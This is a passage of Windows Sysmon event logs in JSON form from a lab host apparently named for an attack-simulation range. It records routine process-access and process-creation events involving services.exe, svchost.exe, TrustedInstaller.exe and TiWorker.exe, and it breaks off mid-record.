{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1076,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.156\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 944\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01BB-5F25-0000-00100E6D0200}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.156","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"944","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01BB-5F25-0000-00100E6D0200}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1077,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.156\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01BB-5F25-0000-00100E6D0200}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.156","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01BB-5F25-0000-00100E6D0200}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1078,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.156\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1124\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01BB-5F25-0000-00100E6D0200}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.156","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1124","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01BB-5F25-0000-00100E6D0200}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1079,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.203\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01BB-5F25-0000-00100E6D0200}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.203","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01BB-5F25-0000-00100E6D0200}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1080,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.218\r\nProcessGuid: {A837DB8D-01BB-5F25-0000-0010C76E0200}\r\nProcessId: 3008\r\nImage: C:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nFileVersion: 10.0.14393.3801 (rs1_release.200610-1742)\r\nDescription: Windows Modules Installer Worker\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: TiWorker.exe\r\nCommandLine: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=0CE9C52C23CA8BE3667A9FEFDE41FC15,SHA256=54B3EE99CA831ED9249669FDB9510CAF202F97ED816FA15D4B4791F86760C8E1,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19\r\nParentProcessGuid: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.218","ProcessGuid":"{A837DB8D-01BB-5F25-0000-0010C76E0200}","Image":"C:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","FileVersion":"10.0.14393.3801 (rs1_release.200610-1742)","Description":"Windows Modules Installer Worker","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"TiWorker.exe","CommandLine":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=0CE9C52C23CA8BE3667A9FEFDE41FC15,SHA256=54B3EE99CA831ED9249669FDB9510CAF202F97ED816FA15D4B4791F86760C8E1,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19","ParentProcessGuid":"{A837DB8D-01B5-5F25-0000-0010B4650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1081,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.219\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01BB-5F25-0000-0010C76E0200}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.219","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01BB-5F25-0000-0010C76E0200}","TargetProcessId":"3008","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1082,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.219\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01BB-5F25-0000-0010C76E0200}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.219","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01BB-5F25-0000-0010C76E0200}","TargetProcessId":"3008","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1083,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.219\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01BB-5F25-0000-0010C76E0200}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.219","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01BB-5F25-0000-0010C76E0200}","TargetProcessId":"3008","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1084,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.281\r\nSourceProcessGUID: {A837DB8D-01BB-5F25-0000-0010C76E0200}\r\nSourceProcessId: 3008\r\nSourceThreadId: 3028\r\nSourceImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nTargetProcessGUID: {A837DB8D-01BB-5F25-0000-00100E6D0200}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe+3611|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\